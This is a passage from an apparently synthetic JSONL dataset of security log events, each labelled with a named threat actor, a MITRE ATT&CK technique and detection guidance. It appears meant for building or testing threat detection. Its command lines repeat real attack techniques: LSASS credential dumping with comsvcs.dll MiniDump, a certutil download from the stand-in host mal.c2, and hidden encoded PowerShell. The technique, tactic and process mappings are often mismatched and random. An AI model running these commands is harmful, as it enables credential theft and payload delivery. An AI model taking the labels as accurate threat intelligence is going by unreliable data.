full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-12-12T07:12:25.000Z","user":{"name":"i-uii4o61v6wvp","sid":"S-1-5-21-458434682-907805856-3603"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Initial Access","Impact"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20261019T035224000Z_0012743","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.27.75.40","name":"EC2-INST-E87VB9XLIG","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12743Lapsus$T1059.001"},"network":{"domain":"github.com","dst_ip":"1.10.233.208","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3272 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-09-05T03:52:53.000Z","user":{"name":"i-m8oavm3hwe6e","sid":"S-1-5-21-668471094-835249007-5271"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Reconnaissance","Exfiltration","Execution"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20250528T071326000Z_0012745","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.185.5.207","name":"IAM-ROLE-F2C09QRPXE","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12745Volt TyphoonT1071.001"},"network":{"domain":"github.com","dst_ip":"1.123.155.127","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-07-26T13:56:24.000Z","user":{"name":"svc_1iseod0ic1ax","sid":"S-1-5-21-873112165-567701811-9454"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Defense Evasion"],"technique_id":"T1570"},"event_id":"evt_lapsus_20261021T152316000Z_0012747","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.115.159.205","name":"IAM-ROLE-77QH6I3GJ2","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12747Lapsus$T1570"},"network":{"domain":"github.com","dst_ip":"1.0.107.59","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 882 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-05-16T15:14:17.000Z","user":{"name":"CORP\\d70cmj69s2r3","sid":"S-1-5-21-965853840-299723431-2154"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement","Exfiltration"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20250811T041201000Z_0012749","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.252.86.165","name":"APP-WEB-4YF7RACKRG","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12749FIN7T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.111.68.95","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2266 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-29T11:55:28.000Z","user":{"name":"i-h4sf98g2246w","sid":"S-1-5-21-336980645-682174323-4953"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250602T040818000Z_0012751","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.65.152.171","name":"IAM-ROLE-102TTA6CZX","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12751Scattered SpiderT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.178.59.39","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-12T15:11:22.000Z","user":{"name":"arn:aws:iam::o5d10zjc0245","sid":"S-1-5-21-225112060-175109074-1622"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Defense Evasion","Persistence"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20260430T161829000Z_0012753","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.32.57.187","name":"AZURE-VM-LFXY4JVX6O","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12753Scattered SpiderT1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.87.214.118","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2140 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-01-22T14:41:48.000Z","user":{"name":"i-f5xvco0j5e3o","sid":"S-1-5-21-413007764-966004486-4257"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Reconnaissance","Collection","Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20261106T165427000Z_0012755","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.1.165.109","name":"AZURE-VM-VWS3EZ1Y5W","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12755Volt TyphoonT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.188.8.211","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3165 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-05-02T06:39:02.000Z","user":{"name":"azuread\\8z3g25034prh","sid":"S-1-5-21-508812274-823555532-5135"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20260311T151714000Z_0012757","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.138.10.92","name":"DB-ORACLE-6AZY1PJYYQ","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12757APT29T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.179.142.234","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-08-13T09:44:26.000Z","user":{"name":"svc_0sos5wsy2kmo","sid":"S-1-5-21-998860830-693659422-9610"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Initial Access"],"technique_id":"T1531"},"event_id":"evt_apt41_20250104T085021000Z_0012759","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.171.199.182","name":"WIN-FIN-SRV-Q1YHUH1C6L","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12759APT41T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.105.173.2","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-02-05T21:50:57.000Z","user":{"name":"svc_p6tr1yu3iw2m","sid":"S-1-5-21-864679946-332974971-4423"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Collection","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250327T231858000Z_0012761","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.224.148.12","name":"EC2-INST-PLHL13NZ0C","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12761Scattered SpiderT1566.001"},"network":{"domain":"github.com","dst_ip":"1.57.240.95","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3591 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-11-23T18:16:52.000Z","user":{"name":"svc_f6fffvbnugr5","sid":"S-1-5-21-883688133-174516097-6353"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Execution","Initial Access","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20261119T204346000Z_0012763","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.118.239.229","name":"EC2-INST-ZIU6G6Z0L8","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12763Volt TyphoonT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.64.235.72","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-28T21:30:25.000Z","user":{"name":"svc_8uj31w8d3vr5","sid":"S-1-5-21-916889860-516055534-5539"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access","Command and Control","Initial Access"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20261210T081145000Z_0012765","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.132.53.27","name":"WIN-FIN-SRV-3WC6NSVUW7","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12765FIN7T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.175.89.33","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1528 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-13T12:58:46.000Z","user":{"name":"i-vjxg906sc74i","sid":"S-1-5-21-395160500-701541265-1610"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Execution","Impact","Discovery"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20250228T162024000Z_0012767","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.145.183.221","name":"EC2-INST-NMP6973PIF","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12767APT29T1003.001"},"network":{"domain":"github.com","dst_ip":"1.108.174.27","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-02-11T06:32:34.000Z","user":{"name":"CORP\\h53avv52xqiu","sid":"S-1-5-21-475758998-225175882-1288"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Reconnaissance","Credential Access"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20260512T224435000Z_0012769","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.220.75.174","name":"DB-ORACLE-HNU47CHBSL","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12769FIN7T1059.001"},"network":{"domain":"github.com","dst_ip":"1.61.205.112","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-08-06T22:45:22.000Z","user":{"name":"azuread\\efzu1yh7wl7b","sid":"S-1-5-21-542088609-933746354-5809"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution","Persistence","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_apt29_20260507T234436000Z_0012771","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.110.192.40","name":"APP-WEB-WICBJ51B7N","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12771APT29T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.41.147.71","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-08-11T08:27:18.000Z","user":{"name":"azuread\\nhvtluxykmxj","sid":"S-1-5-21-137690896-299889977-3191"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution","Persistence"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20250827T205515000Z_0012773","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.221.16.164","name":"DB-ORACLE-2TWOQ9LJGP","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12773Mustang PandaT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.168.166.234","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-06-25T14:30:18.000Z","user":{"name":"CORP\\hh5kdiecy389","sid":"S-1-5-21-325908623-736876608-4210"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation","Lateral Movement","Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260319T010730000Z_0012775","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.133.169.41","name":"APP-WEB-T4I8BMHB7A","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12775FIN7T1021.006"},"network":{"domain":"github.com","dst_ip":"1.170.159.127","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-08-15T09:26:34.000Z","user":{"name":"CORP\\qp3kplxjfpon","sid":"S-1-5-21-909473377-873412571-7313"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Persistence","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20261120T164952000Z_0012777","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.215.192.48","name":"AZURE-VM-14H362QYM6","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12777APT41T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.64.110.54","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3520 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-22T12:32:05.000Z","user":{"name":"i-v6yuvaz5n6s7","sid":"S-1-5-21-964749331-605015558-7716"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20250918T135327000Z_0012779","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.141.229.222","name":"APP-WEB-C2L5A0URFP","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12779Lapsus$T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.143.41.212","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-20T16:54:14.000Z","user":{"name":"CORP\\3a8az2l6nkmr","sid":"S-1-5-21-715860942-385769239-1365"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection","Credential Access"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20250329T000134000Z_0012781","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.206.232.1","name":"APP-WEB-XRTB41ZHWC","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12781Mustang PandaT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.8.189.162","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-06-25T02:55:20.000Z","user":{"name":"CORP\\kber1qgaewt2","sid":"S-1-5-21-565289733-989856661-9140"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access","Impact","Discovery"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20260216T203315000Z_0012783","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.182.13.229","name":"AZURE-VM-GZL3UYLUNI","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12783Mustang PandaT1566.001"},"network":{"domain":"github.com","dst_ip":"1.179.211.70","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-08T09:40:52.000Z","user":{"name":"arn:aws:iam::wa12keo1z9ne","sid":"S-1-5-21-497037460-421736007-3992"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Impact"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20260908T055215000Z_0012785","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.38.31.102","name":"EC2-INST-YZMPMNO0FZ","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12785UNC4841T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.174.62.241","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-06-01T22:43:27.000Z","user":{"name":"i-qxbtntfw8t27","sid":"S-1-5-21-180886852-580201858-9976"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20250514T101112000Z_0012787","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.44.195.250","name":"EC2-INST-YSPKYFA9GZ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12787UNC4841T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.84.73.219","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-02-11T09:01:54.000Z","user":{"name":"svc_6ryxp4ssckdi","sid":"S-1-5-21-207331351-811196364-1989"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20250111T035108000Z_0012789","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.143.144.196","name":"DB-ORACLE-7IVGOA3LAD","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12789APT29T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.164.56.185","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe 